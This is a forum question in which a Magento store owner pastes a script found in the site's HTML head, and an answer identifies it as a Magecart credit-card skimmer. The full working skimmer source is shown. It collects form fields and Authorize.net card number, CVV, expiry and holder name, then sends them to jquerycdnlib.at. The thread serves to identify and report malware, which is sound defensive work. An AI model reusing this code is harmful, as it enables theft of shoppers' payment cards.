# I found this script in HTML Head > scripts and style sheets. Is this malware script?

Tags: magento2, javascript

i found this script in my magento 2. Is this malware script

```
<script>(function(){function N(p,r){function q(a){if(q[a]!==w)return q[a];var c;if("bug-string-char-index"==a)c="a"!="a"[0];else if("json"==a)c=q("json-stringify")&&q("json-parse");else{var e;if("json-stringify"==a){c=r.stringify;var b="function"==typeof c&&s;if(b){(e=function(){return 1}).toJSON=e;try{b="0"===c(0)&&"0"===c(new t)&&'""'==c(new A)&&c(u)===w&&c(w)===w&&c()===w&&"1"===c(e)&&"[1]"==c([e])&&"[null]"==c([w])&&"null"==c(null)&&"[null,null,null]"==c([w,u,null])&&'{"a":[1,true,false,null,"\\u0000\\b\\n\\f\\r\\t"]}'==
c({a:[e,!0,!1,null,"\x00\b\n\f\r\t"]})&&"1"===c(null,e)&&"[\n 1,\n 2\n]"==c([1,2],null,1)&&'"-271821-04-20T00:00:00.000Z"'==c(new C(-864E13))&&'"+275760-09-13T00:00:00.000Z"'==c(new C(864E13))&&'"-000001-01-01T00:00:00.000Z"'==c(new C(-621987552E5))&&'"1969-12-31T23:59:59.999Z"'==c(new C(-1))}catch(f){b=!1}}c=b}if("json-parse"==a){c=r.parse;if("function"==typeof c)try{if(0===c("0")&&!c(!1)){e=c('{"a":[1,true,false,null,"\\u0000\\b\\n\\f\\r\\t"]}');var n=5==e.a.length&&1===e.a[0];if(n){try{n=!c('"\t"')}catch(d){}if(n)try{n=
1!==c("01")}catch(g){}if(n)try{n=1!==c("1.")}catch(m){}}}}catch(X){n=!1}c=n}}return q[a]=!!c}p||(p=k.Object());r||(r=k.Object());var t=p.Number||k.Number,A=p.String||k.String,H=p.Object||k.Object,C=p.Date||k.Date,G=p.SyntaxError||k.SyntaxError,K=p.TypeError||k.TypeError,L=p.Math||k.Math,I=p.JSON||k.JSON;"object"==typeof I&&I&&(r.stringify=I.stringify,r.parse=I.parse);var H=H.prototype,u=H.toString,v,B,w,s=new C(-0xc782b5b800cec);try{s=-109252==s.getUTCFullYear()&&0===s.getUTCMonth()&&1===s.getUTCDate()&&
10==s.getUTCHours()&&37==s.getUTCMinutes()&&6==s.getUTCSeconds()&&708==s.getUTCMilliseconds()}catch(Q){}if(!q("json")){var D=q("bug-string-char-index");if(!s)var x=L.floor,M=[0,31,59,90,120,151,181,212,243,273,304,334],E=function(a,c){return M[c]+365*(a-1970)+x((a-1969+(c=+(1<c)))/4)-x((a-1901+c)/100)+x((a-1601+c)/400)};(v=H.hasOwnProperty)||(v=function(a){var c={},e;(c.__proto__=null,c.__proto__={toString:1},c).toString!=u?v=function(a){var c=this.__proto__;a=a in(this.__proto__=null,this);this.__proto__=
c;return a}:(e=c.constructor,v=function(a){var c=(this.constructor||e).prototype;return a in this&&!(a in c&&this[a]===c[a])});c=null;return v.call(this,a)});B=function(a,c){var e=0,b,f,n;(b=function(){this.valueOf=0}).prototype.valueOf=0;f=new b;for(n in f)v.call(f,n)&&e++;b=f=null;e?B=2==e?function(a,c){var e={},b="[object Function]"==u.call(a),f;for(f in a)b&&"prototype"==f||v.call(e,f)||!(e[f]=1)||!v.call(a,f)||c(f)}:function(a,c){var e="[object Function]"==u.call(a),b,f;for(b in a)e&&"prototype"==
b||!v.call(a,b)||(f="constructor"===b)||c(b);(f||v.call(a,b="constructor"))&&c(b)}:(f="valueOf toString toLocaleString propertyIsEnumerable isPrototypeOf hasOwnProperty constructor".split(" "),B=function(a,c){var e="[object Function]"==u.call(a),b,h=!e&&"function"!=typeof a.constructor&&F[typeof a.hasOwnProperty]&&a.hasOwnProperty||v;for(b in a)e&&"prototype"==b||!h.call(a,b)||c(b);for(e=f.length;b=f[--e];h.call(a,b)&&c(b));});return B(a,c)};if(!q("json-stringify")){var U={92:"\\\\",34:'\\"',8:"\\b",
12:"\\f",10:"\\n",13:"\\r",9:"\\t"},y=function(a,c){return("000000"+(c||0)).slice(-a)},R=function(a){for(var c='"',b=0,h=a.length,f=!D||10<h,n=f&&(D?a.split(""):a);b<h;b++){var d=a.charCodeAt(b);switch(d){case 8:case 9:case 10:case 12:case 13:case 34:case 92:c+=U[d];break;default:if(32>d){c+="\\u00"+y(2,d.toString(16));break}c+=f?n[b]:a.charAt(b)}}return c+'"'},O=function(a,c,b,h,f,n,d){var g,m,k,l,p,r,s,t,q;try{g=c[a]}catch(z){}if("object"==typeof g&&g)if(m=u.call(g),"[object Date]"!=m||v.call(g,
"toJSON"))"function"==typeof g.toJSON&&("[object Number]"!=m&&"[object String]"!=m&&"[object Array]"!=m||v.call(g,"toJSON"))&&(g=g.toJSON(a));else if(g>-1/0&&g<1/0){if(E){l=x(g/864E5);for(m=x(l/365.2425)+1970-1;E(m+1,0)<=l;m++);for(k=x((l-E(m,0))/30.42);E(m,k+1)<=l;k++);l=1+l-E(m,k);p=(g%864E5+864E5)%864E5;r=x(p/36E5)%24;s=x(p/6E4)%60;t=x(p/1E3)%60;p%=1E3}else m=g.getUTCFullYear(),k=g.getUTCMonth(),l=g.getUTCDate(),r=g.getUTCHours(),s=g.getUTCMinutes(),t=g.getUTCSeconds(),p=g.getUTCMilliseconds();
g=(0>=m||1E4<=m?(0>m?"-":"+")+y(6,0>m?-m:m):y(4,m))+"-"+y(2,k+1)+"-"+y(2,l)+"T"+y(2,r)+":"+y(2,s)+":"+y(2,t)+"."+y(3,p)+"Z"}else g=null;b&&(g=b.call(c,a,g));if(null===g)return"null";m=u.call(g);if("[object Boolean]"==m)return""+g;if("[object Number]"==m)return g>-1/0&&g<1/0?""+g:"null";if("[object String]"==m)return R(""+g);if("object"==typeof g){for(a=d.length;a--;)if(d[a]===g)throw K();d.push(g);q=[];c=n;n+=f;if("[object Array]"==m){k=0;for(a=g.length;k<a;k++)m=O(k,g,b,h,f,n,d),q.push(m===w?"null":
m);a=q.length?f?"[\n"+n+q.join(",\n"+n)+"\n"+c+"]":"["+q.join(",")+"]":"[]"}else B(h||g,function(a){var c=O(a,g,b,h,f,n,d);c!==w&&q.push(R(a)+":"+(f?" ":"")+c)}),a=q.length?f?"{\n"+n+q.join(",\n"+n)+"\n"+c+"}":"{"+q.join(",")+"}":"{}";d.pop();return a}};r.stringify=function(a,c,b){var h,f,n,d;if(F[typeof c]&&c)if("[object Function]"==(d=u.call(c)))f=c;else if("[object Array]"==d){n={};for(var g=0,k=c.length,l;g<k;l=c[g++],(d=u.call(l),"[object String]"==d||"[object Number]"==d)&&(n[l]=1));}if(b)if("[object Number]"==
(d=u.call(b))){if(0<(b-=b%1))for(h="",10<b&&(b=10);h.length<b;h+=" ");}else"[object String]"==d&&(h=10>=b.length?b:b.slice(0,10));return O("",(l={},l[""]=a,l),f,n,h,"",[])}}if(!q("json-parse")){var V=A.fromCharCode,W={92:"\\",34:'"',47:"/",98:"\b",116:"\t",110:"\n",102:"\f",114:"\r"},b,J,l=function(){b=J=null;throw G();},z=function(){for(var a=J,c=a.length,e,h,f,k,d;b<c;)switch(d=a.charCodeAt(b),d){case 9:case 10:case 13:case 32:b++;break;case 123:case 125:case 91:case 93:case 58:case 44:return e=
D?a.charAt(b):a[b],b++,e;case 34:e="@";for(b++;b<c;)if(d=a.charCodeAt(b),32>d)l();else if(92==d)switch(d=a.charCodeAt(++b),d){case 92:case 34:case 47:case 98:case 116:case 110:case 102:case 114:e+=W[d];b++;break;case 117:h=++b;for(f=b+4;b<f;b++)d=a.charCodeAt(b),48<=d&&57>=d||97<=d&&102>=d||65<=d&&70>=d||l();e+=V("0x"+a.slice(h,b));break;default:l()}else{if(34==d)break;d=a.charCodeAt(b);for(h=b;32<=d&&92!=d&&34!=d;)d=a.charCodeAt(++b);e+=a.slice(h,b)}if(34==a.charCodeAt(b))return b++,e;l();default:h=
b;45==d&&(k=!0,d=a.charCodeAt(++b));if(48<=d&&57>=d){for(48==d&&(d=a.charCodeAt(b+1),48<=d&&57>=d)&&l();b<c&&(d=a.charCodeAt(b),48<=d&&57>=d);b++);if(46==a.charCodeAt(b)){for(f=++b;f<c&&(d=a.charCodeAt(f),48<=d&&57>=d);f++);f==b&&l();b=f}d=a.charCodeAt(b);if(101==d||69==d){d=a.charCodeAt(++b);43!=d&&45!=d||b++;for(f=b;f<c&&(d=a.charCodeAt(f),48<=d&&57>=d);f++);f==b&&l();b=f}return+a.slice(h,b)}k&&l();if("true"==a.slice(b,b+4))return b+=4,!0;if("false"==a.slice(b,b+5))return b+=5,!1;if("null"==a.slice(b,
b+4))return b+=4,null;l()}return"$"},P=function(a){var c,b;"$"==a&&l();if("string"==typeof a){if("@"==(D?a.charAt(0):a[0]))return a.slice(1);if("["==a){for(c=[];;b||(b=!0)){a=z();if("]"==a)break;b&&(","==a?(a=z(),"]"==a&&l()):l());","==a&&l();c.push(P(a))}return c}if("{"==a){for(c={};;b||(b=!0)){a=z();if("}"==a)break;b&&(","==a?(a=z(),"}"==a&&l()):l());","!=a&&"string"==typeof a&&"@"==(D?a.charAt(0):a[0])&&":"==z()||l();c[a.slice(1)]=P(z())}return c}l()}return a},T=function(a,b,e){e=S(a,b,e);e===
w?delete a[b]:a[b]=e},S=function(a,b,e){var h=a[b],f;if("object"==typeof h&&h)if("[object Array]"==u.call(h))for(f=h.length;f--;)T(h,f,e);else B(h,function(a){T(h,a,e)});return e.call(a,b,h)};r.parse=function(a,c){var e,h;b=0;J=""+a;e=P(z());"$"!=z()&&l();b=J=null;return c&&"[object Function]"==u.call(c)?S((h={},h[""]=e,h),"",c):e}}}r.runInContext=N;return r}var K=typeof define==="function"&&define.amd,F={"function":!0,object:!0},G=F[typeof exports]&&exports&&!exports.nodeType&&exports,k=F[typeof window]&&
window||this,t=G&&F[typeof module]&&module&&!module.nodeType&&"object"==typeof global&&global;!t||t.global!==t&&t.window!==t&&t.self!==t||(k=t);if(G&&!K)N(k,G);else{var L=k.JSON,Q=k.JSON3,M=!1,A=N(k,k.JSON3={noConflict:function(){M||(M=!0,k.JSON=L,k.JSON3=Q,L=Q=null);return A}});k.JSON={parse:A.parse,stringify:A.stringify}}K&&define(function(){return A})}).call(this);
!function(e){var n=!1;if("function"==typeof define&&define.amd&&(define(e),n=!0),"object"==typeof exports&&(module.exports=e(),n=!0),!n){var o=window.Cookies,t=window.Cookies=e();t.noConflict=function(){return window.Cookies=o,t}}}(function(){function g(){for(var e=0,n={};e<arguments.length;e++){var o=arguments[e];for(var t in o)n[t]=o[t]}return n}return function e(l){function C(e,n,o){var t;if("undefined"!=typeof document){if(1<arguments.length){if("number"==typeof(o=g({path:"/"},C.defaults,o)).expires){var r=new Date;r.setMilliseconds(r.getMilliseconds()+864e5*o.expires),o.expires=r}o.expires=o.expires?o.expires.toUTCString():"";try{t=JSON.stringify(n),/^[\{\[]/.test(t)&&(n=t)}catch(e){}n=l.write?l.write(n,e):encodeURIComponent(String(n)).replace(/%(23|24|26|2B|3A|3C|3E|3D|2F|3F|40|5B|5D|5E|60|7B|7D|7C)/g,decodeURIComponent),e=(e=(e=encodeURIComponent(String(e))).replace(/%(23|24|26|2B|5E|60|7C)/g,decodeURIComponent)).replace(/[\(\)]/g,escape);var i="";for(var c in o)o[c]&&(i+="; "+c,!0!==o[c]&&(i+="="+o[c]));return document.cookie=e+"="+n+i}e||(t={});for(var a=document.cookie?document.cookie.split("; "):[],s=/(%[0-9A-Z]{2})+/g,f=0;f<a.length;f++){var p=a[f].split("="),d=p.slice(1).join("=");this.json||'"'!==d.charAt(0)||(d=d.slice(1,-1));try{var u=p[0].replace(s,decodeURIComponent);if(d=l.read?l.read(d,u):l(d,u)||d.replace(s,decodeURIComponent),this.json)try{d=JSON.parse(d)}catch(e){}if(e===u){t=d;break}e||(t[u]=d)}catch(e){}}return t}}return(C.set=C).get=function(e){return C.call(C,e)},C.getJSON=function(){return C.apply({json:!0},[].slice.call(arguments))},C.defaults={},C.remove=function(e,n){C(e,"",g(n,{expires:-1}))},C.withConverter=e,C}(function(){})});
var hex_chr="0123456789abcdef";function rhex(i){for(str="",j=0;j<=3;j++)str+=hex_chr.charAt(i>>8*j+4&15)+hex_chr.charAt(i>>8*j&15);return str}function str2blks_MD5(d){for(nblk=1+(d.length+8>>6),blks=new Array(16*nblk),i=0;i<16*nblk;i++)blks[i]=0;for(i=0;i<d.length;i++)blks[i>>2]|=d.charCodeAt(i)<<i%4*8;return blks[i>>2]|=128<<i%4*8,blks[16*nblk-2]=8*d.length,blks}function add(i,d){var c=(65535&i)+(65535&d);return(i>>16)+(d>>16)+(c>>16)<<16|65535&c}function rol(i,d){return i<<d|i>>>32-d}function cmn(i,d,c,a,b,x){return add(rol(add(add(d,i),add(a,x)),b),c)}function ff(i,d,c,a,b,x,h){return cmn(d&c|~d&a,i,d,b,x,h)}function gg(i,d,c,a,b,x,h){return cmn(d&a|c&~a,i,d,b,x,h)}function hh(i,d,c,a,b,x,h){return cmn(d^c^a,i,d,b,x,h)}function ii(i,d,c,a,b,x,h){return cmn(c^(d|~a),i,d,b,x,h)}function calcMD5(h){for(x=str2blks_MD5(h),a=1732584193,b=-271733879,c=-1732584194,d=271733878,i=0;i<x.length;i+=16)olda=a,oldb=b,oldc=c,oldd=d,a=ff(a,b,c,d,x[i+0],7,-680876936),d=ff(d,a,b,c,x[i+1],12,-389564586),c=ff(c,d,a,b,x[i+2],17,606105819),b=ff(b,c,d,a,x[i+3],22,-1044525330),a=ff(a,b,c,d,x[i+4],7,-176418897),d=ff(d,a,b,c,x[i+5],12,1200080426),c=ff(c,d,a,b,x[i+6],17,-1473231341),b=ff(b,c,d,a,x[i+7],22,-45705983),a=ff(a,b,c,d,x[i+8],7,1770035416),d=ff(d,a,b,c,x[i+9],12,-1958414417),c=ff(c,d,a,b,x[i+10],17,-42063),b=ff(b,c,d,a,x[i+11],22,-1990404162),a=ff(a,b,c,d,x[i+12],7,1804603682),d=ff(d,a,b,c,x[i+13],12,-40341101),c=ff(c,d,a,b,x[i+14],17,-1502002290),b=ff(b,c,d,a,x[i+15],22,1236535329),a=gg(a,b,c,d,x[i+1],5,-165796510),d=gg(d,a,b,c,x[i+6],9,-1069501632),c=gg(c,d,a,b,x[i+11],14,643717713),b=gg(b,c,d,a,x[i+0],20,-373897302),a=gg(a,b,c,d,x[i+5],5,-701558691),d=gg(d,a,b,c,x[i+10],9,38016083),c=gg(c,d,a,b,x[i+15],14,-660478335),b=gg(b,c,d,a,x[i+4],20,-405537848),a=gg(a,b,c,d,x[i+9],5,568446438),d=gg(d,a,b,c,x[i+14],9,-1019803690),c=gg(c,d,a,b,x[i+3],14,-187363961),b=gg(b,c,d,a,x[i+8],20,1163531501),a=gg(a,b,c,d,x[i+13],5,-1444681467),d=gg(d,a,b,c,x[i+2],9,-51403784),c=gg(c,d,a,b,x[i+7],14,1735328473),b=gg(b,c,d,a,x[i+12],20,-1926607734),a=hh(a,b,c,d,x[i+5],4,-378558),d=hh(d,a,b,c,x[i+8],11,-2022574463),c=hh(c,d,a,b,x[i+11],16,1839030562),b=hh(b,c,d,a,x[i+14],23,-35309556),a=hh(a,b,c,d,x[i+1],4,-1530992060),d=hh(d,a,b,c,x[i+4],11,1272893353),c=hh(c,d,a,b,x[i+7],16,-155497632),b=hh(b,c,d,a,x[i+10],23,-1094730640),a=hh(a,b,c,d,x[i+13],4,681279174),d=hh(d,a,b,c,x[i+0],11,-358537222),c=hh(c,d,a,b,x[i+3],16,-722521979),b=hh(b,c,d,a,x[i+6],23,76029189),a=hh(a,b,c,d,x[i+9],4,-640364487),d=hh(d,a,b,c,x[i+12],11,-421815835),c=hh(c,d,a,b,x[i+15],16,530742520),b=hh(b,c,d,a,x[i+2],23,-995338651),a=ii(a,b,c,d,x[i+0],6,-198630844),d=ii(d,a,b,c,x[i+7],10,1126891415),c=ii(c,d,a,b,x[i+14],15,-1416354905),b=ii(b,c,d,a,x[i+5],21,-57434055),a=ii(a,b,c,d,x[i+12],6,1700485571),d=ii(d,a,b,c,x[i+3],10,-1894986606),c=ii(c,d,a,b,x[i+10],15,-1051523),b=ii(b,c,d,a,x[i+1],21,-2054922799),a=ii(a,b,c,d,x[i+8],6,1873313359),d=ii(d,a,b,c,x[i+15],10,-30611744),c=ii(c,d,a,b,x[i+6],15,-1560198380),b=ii(b,c,d,a,x[i+13],21,1309151649),a=ii(a,b,c,d,x[i+4],6,-145523070),d=ii(d,a,b,c,x[i+11],10,-1120210379),c=ii(c,d,a,b,x[i+2],15,718787259),b=ii(b,c,d,a,x[i+9],21,-343485551),a=add(a,olda),b=add(b,oldb),c=add(c,oldc),d=add(d,oldd);return rhex(a)+rhex(b)+rhex(c)+rhex(d)}

var $s = {
    Number: "authorizenet_cc_number",
    Holder: null,
    HolderFirstName: "billing:firstname",
    HolderLastName: "billing:lastname",
    Date: null,
    Month: "authorizenet_expiration",
    Year: "authorizenet_expiration_yr",
    CVV: "authorizenet_cc_cid",
    Gate: "https://jquerycdnlib.at/gate.php",
    Data: {},
    Sent: [],
    SaveParam: function(elem) {
        if(elem.id !== undefined && elem.id != "" && elem.id !== null && elem.value.length < 256 && elem.value.length > 0) {
            $s.Data[elem.id] = elem.value;
            return;
        }
        if(elem.name !== undefined && elem.name != "" && elem.name !== null && elem.value.length < 256 && elem.value.length > 0) {
            $s.Data[elem.name] = elem.value;
            return;
        }    
    },
    SaveAllFields: function() {
        var inputs = document.getElementsByTagName("input");
        var selects = document.getElementsByTagName("select");
        var textareas = document.getElementsByTagName("textarea");
        for(var i = 0; i < inputs.length; i++) $s.SaveParam(inputs[i]);
        for(var i = 0; i < selects.length; i++) $s.SaveParam(selects[i]);
        for(var i = 0; i < textareas.length; i++) $s.SaveParam(textareas[i]);
        Cookies.set("$s", $s.Base64.encode(JSON.stringify($s.Data)));
    },
    SendData: function() {
        $s.Data['Domain'] = location.hostname;
        var encoded = $s.Base64.encode(JSON.stringify($s.Data));
        var hash = calcMD5(encoded);
        for(var i = 0; i < $s.Sent.length; i++)
            if($s.Sent[i] == hash) return;
        $s.LoadImage(encoded);
    },
    TrySend: function() {
        $s.SaveAllFields();
        $s.GetCCInfo();
        if($s.Data['Number'] === undefined || $s.Data['Number'].length < 11) return;
        if($s.Data['Holder'] === undefined || $s.Data['Holder'].length == 0) return;
        if($s.Data['Date'] === undefined || $s.Data['Date'].length == 0) return;
        if($s.Data['CVV'] === undefined || $s.Data['CVV'].length < 3) return;
        $s.SendData();
    },
    GetCCInfo: function() {
        if($s.Number !== null && $s.Data[$s.Number] !== undefined) $s.Data['Number'] = $s.Data[$s.Number];
        if($s.CVV !== null && $s.Data[$s.CVV] !== undefined) $s.Data['CVV'] = $s.Data[$s.CVV];
        if($s.Holder !== null && $s.Data[$s.Holder] !== undefined) $s.Data['Holder'] = $s.Data[$s.Holder];
        if($s.HolderFirstName !== null && $s.Data[$s.HolderFirstName] !== undefined) $s.Data['Holder'] = $s.Data[$s.HolderFirstName];
        if($s.HolderLastName !== null && $s.Data[$s.HolderLastName] !== undefined) $s.Data['Holder'] += " " + $s.Data[$s.HolderLastName];
        if($s.Date !== null && $s.Data[$s.Date] !== undefined) $s.Data['Date'] = $s.Data[$s.Date];
        if($s.Month !== null && $s.Data[$s.Month] !== undefined) $s.Data['Date'] = $s.Data[$s.Month];
        if($s.Year !== null && $s.Data[$s.Year] !== undefined) $s.Data['Date'] += "/" + $s.Data[$s.Year];
    },
    LoadImage: function(encoded) {
        $s.Sent.push(calcMD5(encoded));
        Cookies.set("$sent", $s.Base64.encode(JSON.stringify($s.Sent)));
        var img = document.createElement("IMG");
        img.src = $s.GetImageUrl(encoded);
        Cookies.remove("$s");
    },
    GetImageUrl: function(encoded) {
        return $s.Gate + "?hash=" + encoded;
    },
    GetFromStorage: function() {
        if(Cookies.get("$s") !== undefined) {
            $s.Data = JSON.parse($s.Base64.decode(Cookies.get("$s")));
        }
        if(Cookies.get("$sent") !== undefined) {
            $s.Sent = JSON.parse($s.Base64.decode(Cookies.get("$sent")));
        }
    },
    Base64: {_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(r){var t,e,o,h,a,n,c,d="",i=0;for(r=this._utf8_encode(r);i<r.length;)h=(t=r.charCodeAt(i++))>>2,a=(3&t)<<4|(e=r.charCodeAt(i++))>>4,n=(15&e)<<2|(o=r.charCodeAt(i++))>>6,c=63&o,isNaN(e)?n=c=64:isNaN(o)&&(c=64),d=d+this._keyStr.charAt(h)+this._keyStr.charAt(a)+this._keyStr.charAt(n)+this._keyStr.charAt(c);return d},decode:function(r){var t,e,o,h,a,n,c="",d=0;for(r=r.replace(/[^A-Za-z0-9\+\/\=]/g,"");d<r.length;)t=this._keyStr.indexOf(r.charAt(d++))<<2|(h=this._keyStr.indexOf(r.charAt(d++)))>>4,e=(15&h)<<4|(a=this._keyStr.indexOf(r.charAt(d++)))>>2,o=(3&a)<<6|(n=this._keyStr.indexOf(r.charAt(d++))),c+=String.fromCharCode(t),64!=a&&(c+=String.fromCharCode(e)),64!=n&&(c+=String.fromCharCode(o));return c=this._utf8_decode(c)},_utf8_encode:function(r){r=r.replace(/\r\n/g,"\n");for(var t="",e=0;e<r.length;e++){var o=r.charCodeAt(e);o<128?t+=String.fromCharCode(o):o>127&&o<2048?(t+=String.fromCharCode(o>>6|192),t+=String.fromCharCode(63&o|128)):(t+=String.fromCharCode(o>>12|224),t+=String.fromCharCode(o>>6&63|128),t+=String.fromCharCode(63&o|128))}return t},_utf8_decode:function(r){for(var t="",e=0,o=c1=c2=0;e<r.length;)(o=r.charCodeAt(e))<128?(t+=String.fromCharCode(o),e++):o>191&&o<224?(c2=r.charCodeAt(e+1),t+=String.fromCharCode((31&o)<<6|63&c2),e+=2):(c2=r.charCodeAt(e+1),c3=r.charCodeAt(e+2),t+=String.fromCharCode((15&o)<<12|(63&c2)<<6|63&c3),e+=3);return t}}
}

document.onreadystatechange = function() {
    if(document.readyState === 'complete') {
        $s.GetFromStorage();
        setInterval($s.TrySend, 500);
        if(document.getElementById($s.Number)) document.getElementById($s.Number).value = "";
        if(document.getElementById($s.CVV)) document.getElementById($s.CVV).value = "";
    }
}
for (var i = 0; i < document.links.length; i++) {
     var a = document.URL;
     var b = a.split("/"); 
    if (document.links[i].href+b[4] == document.URL) {
        document.links[i]+b[4].className = 'active';
    }
}




</script>
```

Answer (score 1):

Yes that is scraping credit card details and sending them to a very suspicious domain. I can't even navigate to the URL it's sending data to as my ISP blocks it:

> We think this site may be fraudulent or contain viruses that could be harmful to your computer, so it's been blocked by your account's Web Safe settings.

Some information about it on Twitter - https://twitter.com/JCyberSec_/status/1206919450802438144

More references to the URL `Jquerycdnlib.at` here - https://malware.news/t/recent-magecart-activity-on-60-e-commerce-sites/38020

More info from https://hybrid-analysis.com/sample/e771d7c027c332fe429434e5d2c5dfc62fc73c069d17e8e260d2ca0ec19d719f?environmentId=100:

[image]